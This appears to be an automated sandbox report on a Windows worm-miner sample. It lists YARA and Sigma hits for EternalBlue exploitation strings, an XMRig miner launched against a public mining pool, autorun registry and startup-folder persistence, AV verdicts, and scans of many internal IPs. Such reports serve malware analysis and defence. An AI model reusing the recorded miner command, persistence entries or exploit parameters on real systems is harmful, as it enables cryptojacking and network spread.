0000003E.00000000.2047317453.00000000005EA000.00000002.00000001.01000000.00000003.sdmp	INDICATOR_TOOL_EXP_EternalBlue	Detects Windows executables containing EternalBlue explitation artifacts	ditekSHen	0x5bb4e:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x5bf6a:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x5bc16:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x5bdc7:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x5c032:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
00000059.00000002.2062381455.00007FF66FAE1000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: x00zm3KVwb.exe PID: 5708	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: x00zm3KVwb.exe PID: 5708	INDICATOR_TOOL_EXP_EternalBlue	Detects Windows executables containing EternalBlue explitation artifacts	ditekSHen	0x13e4e:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x106b8a:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x106f9f:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x1082b2:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x1086c8:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x148958:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x13f29:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x37db6:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x106c52:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x106dff:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x107067:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x10837a:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x108529:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x108790:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x148a33:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
Process Memory Space: x00zm3KVwb.exe PID: 7120	INDICATOR_TOOL_EXP_EternalBlue	Detects Windows executables containing EternalBlue explitation artifacts	ditekSHen	0x3b850:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x3bc65:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x3cf78:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x3d38e:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x3b918:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x3bac5:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x3bd2d:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x3d040:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x3d1ef:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x3d456:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
Process Memory Space: x00zm3KVwb.exe PID: 7796	INDICATOR_TOOL_EXP_EternalBlue	Detects Windows executables containing EternalBlue explitation artifacts	ditekSHen	0x495bd:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x499d2:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x4ace5:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x4b0fb:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x49685:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x49832:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x49a9a:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x4adad:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x4af5c:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x4b1c3:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
Process Memory Space: syabcd.exe PID: 6400	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
19.2.x00zm3KVwb.exe.330000.0.unpack	INDICATOR_TOOL_EXP_EternalBlue	Detects Windows executables containing EternalBlue explitation artifacts	ditekSHen	0x314d4e:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x31516a:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x314e16:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x314fc7:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x315232:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
0.0.x00zm3KVwb.exe.330000.0.unpack	INDICATOR_TOOL_EXP_EternalBlue	Detects Windows executables containing EternalBlue explitation artifacts	ditekSHen	0x314d4e:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x31516a:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x314e16:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x314fc7:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x315232:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
62.0.x00zm3KVwb.exe.330000.0.unpack	INDICATOR_TOOL_EXP_EternalBlue	Detects Windows executables containing EternalBlue explitation artifacts	ditekSHen	0x314d4e:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x31516a:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x314e16:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x314fc7:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x315232:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
19.0.x00zm3KVwb.exe.330000.0.unpack	INDICATOR_TOOL_EXP_EternalBlue	Detects Windows executables containing EternalBlue explitation artifacts	ditekSHen	0x314d4e:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x31516a:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x314e16:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x314fc7:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x315232:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
62.2.x00zm3KVwb.exe.330000.0.unpack	INDICATOR_TOOL_EXP_EternalBlue	Detects Windows executables containing EternalBlue explitation artifacts	ditekSHen	0x314d4e:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x31516a:$cm1: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll 0x314e16:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x314fc7:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll 0x315232:$cm2: --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
89.2.syabcd.exe.7ff66fae0000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
89.2.syabcd.exe.7ff66fae0000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x330199:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume 0x32e448:$s1: [%s] login error code: %d
89.2.syabcd.exe.7ff66fae0000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x330640:$s1: %s/%s (Windows NT %lu.%lu 0x334150:$s3: \\.\WinRing0_ 0x3329f0:$s5: cryptonight 0x332a00:$s5: cryptonight 0x332a10:$s5: cryptonight 0x332a20:$s5: cryptonight 0x332a40:$s5: cryptonight 0x332a50:$s5: cryptonight 0x332a60:$s5: cryptonight 0x332a80:$s5: cryptonight 0x332a90:$s5: cryptonight 0x332aa8:$s5: cryptonight 0x332ac0:$s5: cryptonight 0x332ad0:$s5: cryptonight 0x332ae8:$s5: cryptonight 0x332b00:$s5: cryptonight 0x332b18:$s5: cryptonight 0x332b30:$s5: cryptonight 0x332b40:$s5: cryptonight 0x332b60:$s5: cryptonight 0x332b78:$s5: cryptonight
Click to see the 3 entries

Sigma Signatures

Bitcoin Miner

Sigma detected: Xmrig

Source: Process started

Author: Joe Security: Data: Command: C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K, CommandLine: C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K, CommandLine|base64offset|contains: , Image: C:\ProgramData\syabcd.exe, NewProcessName: C:\ProgramData\syabcd.exe, OriginalFileName: C:\ProgramData\syabcd.exe, ParentCommandLine: "C:\Users\user\Desktop\x00zm3KVwb.exe", ParentImage: C:\Users\user\Desktop\x00zm3KVwb.exe, ParentProcessId: 5708, ParentProcessName: x00zm3KVwb.exe, ProcessCommandLine: C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K, ProcessId: 2468, ProcessName: syabcd.exe

System Summary

Sigma detected: Potential Crypto Mining Activity

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K, CommandLine: C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K, CommandLine|base64offset|contains: , Image: C:\ProgramData\syabcd.exe, NewProcessName: C:\ProgramData\syabcd.exe, OriginalFileName: C:\ProgramData\syabcd.exe, ParentCommandLine: "C:\Users\user\Desktop\x00zm3KVwb.exe", ParentImage: C:\Users\user\Desktop\x00zm3KVwb.exe, ParentProcessId: 5708, ParentProcessName: x00zm3KVwb.exe, ProcessCommandLine: C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K, ProcessId: 2468, ProcessName: syabcd.exe

Sigma detected: Suspicious Epmap Connection

Source: Network Connection

Author: frack113, Tim Shelton (fps): Data: DestinationIp: 192.168.2.1, DestinationIsIpv6: false, DestinationPort: 135, EventID: 3, Image: C:\Users\user\Desktop\x00zm3KVwb.exe, Initiated: true, ProcessId: 5708, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49888

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Desktop\x00zm3KVwb.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\x00zm3KVwb.exe, ProcessId: 5708, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\QQMusic

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\x00zm3KVwb.exe, ProcessId: 5708, TargetFilename: K:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\spread.exe

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Desktop\x00zm3KVwb.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\x00zm3KVwb.exe, ProcessId: 5708, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QQMusic

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: x00zm3KVwb.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\ProgramData\spread.txt	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\ProgramData\X86.dll	Avira: detection malicious, Label: HEUR/AGEN.1303057
Source: C:\ProgramData\syabcd.exe	Avira: detection malicious, Label: HEUR/AGEN.1353231

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\SMB.exe	ReversingLabs: Detection: 75%
Source: C:\ProgramData\spread.txt	ReversingLabs: Detection: 81%
Source: C:\ProgramData\syabcd.exe	ReversingLabs: Detection: 69%

Multi AV Scanner detection for submitted file

Source: x00zm3KVwb.exe

ReversingLabs: Detection: 81%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.3% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\SMB.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\spread.txt	Joe Sandbox ML: detected
Source: C:\ProgramData\X86.dll	Joe Sandbox ML: detected
Source: C:\ProgramData\syabcd.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: x00zm3KVwb.exe

Joe Sandbox ML: detected

Exploits

Connects to many different private IPs (likely to spread or exploit)

Source: global traffic	TCP traffic: 192.168.2.148:80
Source: global traffic	TCP traffic: 192.168.2.149:80
Source: global traffic	TCP traffic: 192.168.2.146:80
Source: global traffic	TCP traffic: 192.168.2.147:80
Source: global traffic	TCP traffic: 192.168.2.140:80
Source: global traffic	TCP traffic: 192.168.2.141:80
Source: global traffic	TCP traffic: 192.168.2.144:80
Source: global traffic	TCP traffic: 192.168.2.145:80
Source: global traffic	TCP traffic: 192.168.2.142:80
Source: global traffic	TCP traffic: 192.168.2.143:80
Source: global traffic	TCP traffic: 192.168.2.159:80
Source: global traffic	TCP traffic: 192.168.2.157:80
Source: global traffic	TCP traffic: 192.168.2.158:80
Source: global traffic	TCP traffic: 192.168.2.151:80
Source: global traffic	TCP traffic: 192.168.2.152:80
Source: global traffic	TCP traffic: 192.168.2.150:80
Source: global traffic	TCP traffic: 192.168.2.155:80
Source: global traffic	TCP traffic: 192.168.2.156:80
Source: global traffic	TCP traffic: 192.168.2.153:80
Source: global traffic	TCP traffic: 192.168.2.154:80
Source: global traffic	TCP traffic: 192.168.2.126:80
Source: global traffic	TCP traffic: 192.168.2.247:80
Source: global traffic	TCP traffic: 192.168.2.127:80
Source: global traffic	TCP traffic: 192.168.2.248:80
Source: global traffic	TCP traffic: 192.168.2.124:80
Source: global traffic	TCP traffic: 192.168.2.245:80
Source: global traffic	TCP traffic: 192.168.2.125:80
Source: global traffic	TCP traffic: 192.168.2.246:80
Source: global traffic	TCP traffic: 192.168.2.128:80
Source: global traffic	TCP traffic: 192.168.2.249:80
Source: global traffic	TCP traffic: 192.168.2.129:80
Source: global traffic	TCP traffic: 192.168.2.240:80
Source: global traffic	TCP traffic: 192.168.2.122:80
Source: global traffic	TCP traffic: 192.168.2.243:80
Source: global traffic	TCP traffic: 192.168.2.123:80
Source: global traffic	TCP traffic: 192.168.2.244:80
Source: global traffic	TCP traffic: 192.168.2.120:80
Source: global traffic	TCP traffic: 192.168.2.241:80
Source: global traffic	TCP traffic: 192.168.2.121:80
Source: global traffic	TCP traffic: 192.168.2.242:80
Source: global traffic	TCP traffic: 192.168.2.97:80
Source: global traffic	TCP traffic: 192.168.2.137:80
Source: global traffic	TCP traffic: 192.168.2.96:80
Source: global traffic	TCP traffic: 192.168.2.138:80
Source: global traffic	TCP traffic: 192.168.2.99:80
Source: global traffic	TCP traffic: 192.168.2.135:80
Source: global traffic	TCP traffic: 192.168.2.98:80
Source: global traffic	TCP traffic: 192.168.2.136:80
Source: global traffic	TCP traffic: 192.168.2.139:80
Source: global traffic	TCP traffic: 192.168.2.250:80
Source: global traffic	TCP traffic: 192.168.2.130:80
Source: global traffic	TCP traffic: 192.168.2.251:80
Source: global traffic	TCP traffic: 192.168.2.91:80
Source: global traffic	TCP traffic: 192.168.2.90:80
Source: global traffic	TCP traffic: 192.168.2.93:80
Source: global traffic	TCP traffic: 192.168.2.133:80
Source: global traffic	TCP traffic: 192.168.2.254:80
Source: global traffic	TCP traffic: 192.168.2.92:80
Source: global traffic	TCP traffic: 192.168.2.134:80
Source: global traffic	TCP traffic: 192.168.2.95:80
Source: global traffic	TCP traffic: 192.168.2.131:80
Source: global traffic	TCP traffic: 192.168.2.252:80
Source: global traffic	TCP traffic: 192.168.2.94:80
Source: global traffic	TCP traffic: 192.168.2.132:80
Source: global traffic	TCP traffic: 192.168.2.253:80
Source: global traffic	TCP traffic: 192.168.2.104:80
Source: global traffic	TCP traffic: 192.168.2.225:80
Source: global traffic	TCP traffic: 192.168.2.105:80
Source: global traffic	TCP traffic: 192.168.2.226:80
Source: global traffic	TCP traffic: 192.168.2.102:80
Source: global traffic	TCP traffic: 192.168.2.223:80
Source: global traffic	TCP traffic: 192.168.2.103:80
Source: global traffic	TCP traffic: 192.168.2.224:80
Source: global traffic	TCP traffic: 192.168.2.108:80
Source: global traffic	TCP traffic: 192.168.2.229:80
Source: global traffic	TCP traffic: 192.168.2.109:80
Source: global traffic	TCP traffic: 192.168.2.106:80
Source: global traffic	TCP traffic: 192.168.2.227:80
Source: global traffic	TCP traffic: 192.168.2.107:80
Source: global traffic	TCP traffic: 192.168.2.228:80
Source: global traffic	TCP traffic: 192.168.2.100:80
Source: global traffic	TCP traffic: 192.168.2.221:80
Source: global traffic	TCP traffic: 192.168.2.101:80
Source: global traffic	TCP traffic: 192.168.2.222:80
Source: global traffic	TCP traffic: 192.168.2.220:80
Source: global traffic	TCP traffic: 192.168.2.115:80
Source: global traffic	TCP traffic: 192.168.2.236:80
Source: global traffic	TCP traffic: 192.168.2.116:80
Source: global traffic	TCP traffic: 192.168.2.237:80
Source: global traffic	TCP traffic: 192.168.2.113:80
Source: global traffic	TCP traffic: 192.168.2.234:80
Source: global traffic	TCP traffic: 192.168.2.114:80
Source: global traffic	TCP traffic: 192.168.2.235:80
Source: global traffic	TCP traffic: 192.168.2.119:80
Source: global traffic	TCP traffic: 192.168.2.117:80
Source: global traffic	TCP traffic: 192.168.2.238:80
Source: global traffic	TCP traffic: 192.168.2.118:80
Source: global traffic	TCP traffic: 192.168.2.239:80
Source: global traffic	TCP traffic: 192.168.2.111:80
Source: global traffic	TCP traffic: 192.168.2.232:80
Source: global traffic	TCP traffic: 192.168.2.112:80
Source: global traffic	TCP traffic: 192.168.2.233:80
Source: global traffic	TCP traffic: 192.168.2.230:80
Source: global traffic	TCP traffic: 192.168.2.110:80
Source: global traffic	TCP traffic: 192.168.2.231:80
Source: global traffic	TCP traffic: 192.168.2.203:80
Source: global traffic	TCP traffic: 192.168.2.204:80
Source: global traffic	TCP traffic: 192.168.2.201:80
Source: global traffic	TCP traffic: 192.168.2.202:80
Source: global traffic	TCP traffic: 192.168.2.207:80
Source: global traffic	TCP traffic: 192.168.2.208:80
Source: global traffic	TCP traffic: 192.168.2.205:80
Source: global traffic	TCP traffic: 192.168.2.206:80
Source: global traffic	TCP traffic: 192.168.2.200:80
Source: global traffic	TCP traffic: 192.168.2.209:80
Source: global traffic	TCP traffic: 192.168.2.214:80
Source: global traffic	TCP traffic: 192.168.2.215:80
Source: global traffic	TCP traffic: 192.168.2.212:80
Source: global traffic	TCP traffic: 192.168.2.213:80
Source: global traffic	TCP traffic: 192.168.2.218:80
Source: global traffic	TCP traffic: 192.168.2.219:80
Source: global traffic	TCP traffic: 192.168.2.216:80
Source: global traffic	TCP traffic: 192.168.2.217:80
Source: global traffic	TCP traffic: 192.168.2.210:80
Source: global traffic	TCP traffic: 192.168.2.211:80
Source: global traffic	TCP traffic: 192.168.2.39:80
Source: global traffic	TCP traffic: 192.168.2.38:80
Source: global traffic	TCP traffic: 192.168.2.42:80
Source: global traffic	TCP traffic: 192.168.2.41:80
Source: global traffic	TCP traffic: 192.168.2.44:80
Source: global traffic	TCP traffic: 192.168.2.43:80
Source: global traffic	TCP traffic: 192.168.2.46:80
Source: global traffic	TCP traffic: 192.168.2.45:80
Source: global traffic	TCP traffic: 192.168.2.48:80
Source: global traffic	TCP traffic: 192.168.2.47:80
Source: global traffic	TCP traffic: 192.168.2.40:80
Source: global traffic	TCP traffic: 192.168.2.28:80
Source: global traffic	TCP traffic: 192.168.2.27:80
Source: global traffic	TCP traffic: 192.168.2.29:80
Source: global traffic	TCP traffic: 192.168.2.31:80
Source: global traffic	TCP traffic: 192.168.2.30:80
Source: global traffic	TCP traffic: 192.168.2.33:80
Source: global traffic	TCP traffic: 192.168.2.32:80
Source: global traffic	TCP traffic: 192.168.2.35:80
Source: global traffic	TCP traffic: 192.168.2.34:80
Source: global traffic	TCP traffic: 192.168.2.37:80
Source: global traffic	TCP traffic: 192.168.2.36:80
Source: global traffic	TCP traffic: 192.168.2.17:80
Source: global traffic	TCP traffic: 192.168.2.16:80
Source: global traffic	TCP traffic: 192.168.2.19:80
Source: global traffic	TCP traffic: 192.168.2.18:80
Source: global traffic	TCP traffic: 192.168.2.20:80
Source: global traffic	TCP traffic: 192.168.2.22:80
Source: global traffic	TCP traffic: 192.168.2.21:80
Source: global traffic	TCP traffic: 192.168.2.24:80
Source: global traffic	TCP traffic: 192.168.2.23:80
Source: global traffic	TCP traffic: 192.168.2.26:80
Source: global traffic	TCP traffic: 192.168.2.25:80
Source: global traffic	TCP traffic: 192.168.2.11:80
Source: global traffic	TCP traffic: 192.168.2.10:80
Source: global traffic	TCP traffic: 192.168.2.13:80
Source: global traffic	TCP traffic: 192.168.2.12:80
Source: global traffic	TCP traffic: 192.168.2.15:80
Source: global traffic	TCP traffic: 192.168.2.14:80
Source: global traffic	TCP traffic: 192.168.2.0:80
Source: global traffic	TCP traffic: 192.168.2.2:80
Source: global traffic	TCP traffic: 192.168.2.1:80
Source: global traffic	TCP traffic: 192.168.2.180:80
Source: global traffic	TCP traffic: 192.168.2.181:80
Source: global traffic	TCP traffic: 192.168.2.8:80
Source: global traffic	TCP traffic: 192.168.2.7:80
Source: global traffic	TCP traffic: 192.168.2.9:80
Source: global traffic	TCP traffic: 192.168.2.4:80
Source: global traffic	TCP traffic: 192.168.2.3:80
Source: global traffic	TCP traffic: 192.168.2.6:80
Source: global traffic	TCP traffic: 192.168.2.5:19490
Source: global traffic	TCP traffic: 192.168.2.86:80
Source: global traffic	TCP traffic: 192.168.2.85:80
Source: global traffic	TCP traffic: 192.168.2.88:80
Source: global traffic	TCP traffic: 192.168.2.87:80
Source: global traffic	TCP traffic: 192.168.2.89:80
Source: global traffic	TCP traffic: 192.168.2.184:80
Source: global traffic	TCP traffic: 192.168.2.185:80
Source: global traffic	TCP traffic: 192.168.2.80:80
Source: global traffic	TCP traffic: 192.168.2.182:80
Source: global traffic	TCP traffic: 192.168.2.183:80
Source: global traffic	TCP traffic: 192.168.2.82:80
Source: global traffic	TCP traffic: 192.168.2.188:80
Source: global traffic	TCP traffic: 192.168.2.81:80
Source: global traffic	TCP traffic: 192.168.2.189:80
Source: global traffic	TCP traffic: 192.168.2.84:80
Source: global traffic	TCP traffic: 192.168.2.186:80
Source: global traffic	TCP traffic: 192.168.2.83:80
Source: global traffic	TCP traffic: 192.168.2.187:80
Source: global traffic	TCP traffic: 192.168.2.191:80
Source: global traffic	TCP traffic: 192.168.2.192:80
Source: global traffic	TCP traffic: 192.168.2.190:80
Source: global traffic	TCP traffic: 192.168.2.75:80
Source: global traffic	TCP traffic: 192.168.2.74:80
Source: global traffic	TCP traffic: 192.168.2.77:80
Source: global traffic	TCP traffic: 192.168.2.76:80
Source: global traffic	TCP traffic: 192.168.2.79:80
Source: global traffic	TCP traffic: 192.168.2.78:80
Source: global traffic	TCP traffic: 192.168.2.195:80
Source: global traffic	TCP traffic: 192.168.2.196:80
Source: global traffic	TCP traffic: 192.168.2.193:80
Source: global traffic	TCP traffic: 192.168.2.194:80
Source: global traffic	TCP traffic: 192.168.2.71:80
Source: global traffic	TCP traffic: 192.168.2.199:80
Source: global traffic	TCP traffic: 192.168.2.70:80
Source: global traffic	TCP traffic: 192.168.2.73:80
Source: global traffic	TCP traffic: 192.168.2.197:80
Source: global traffic	TCP traffic: 192.168.2.72:80
Source: global traffic	TCP traffic: 192.168.2.198:80
Source: global traffic	TCP traffic: 192.168.2.64:80
Source: global traffic	TCP traffic: 192.168.2.63:80
Source: global traffic	TCP traffic: 192.168.2.66:80
Source: global traffic	TCP traffic: 192.168.2.168:80
Source: global traffic	TCP traffic: 192.168.2.65:80
Source: global traffic	TCP traffic: 192.168.2.169:80
Source: global traffic	TCP traffic: 192.168.2.68:80
Source: global traffic	TCP traffic: 192.168.2.67:80
Source: global traffic	TCP traffic: 192.168.2.69:80
Source: global traffic	TCP traffic: 192.168.2.162:80
Source: global traffic	TCP traffic: 192.168.2.163:80
Source: global traffic	TCP traffic: 192.168.2.160:80
Source: global traffic	TCP traffic: 192.168.2.161:80
Source: global traffic	TCP traffic: 192.168.2.60:80
Source: global traffic	TCP traffic: 192.168.2.166:80
Source: global traffic	TCP traffic: 192.168.2.167:80
Source: global traffic	TCP traffic: 192.168.2.62:80
Source: global traffic	TCP traffic: 192.168.2.164:80
Source: global traffic	TCP traffic: 192.168.2.61:80
Source: global traffic	TCP traffic: 192.168.2.165:80
Source: global traffic	TCP traffic: 192.168.2.170:80
Source: global traffic	TCP traffic: 192.168.2.49:80
Source: global traffic	TCP traffic: 192.168.2.53:80
Source: global traffic	TCP traffic: 192.168.2.52:80
Source: global traffic	TCP traffic: 192.168.2.55:80
Source: global traffic	TCP traffic: 192.168.2.179:80
Source: global traffic	TCP traffic: 192.168.2.54:80
Source: global traffic	TCP traffic: 192.168.2.57:80
Source: global traffic	TCP traffic: 192.168.2.56:80
Source: global traffic	TCP traffic: 192.168.2.59:80
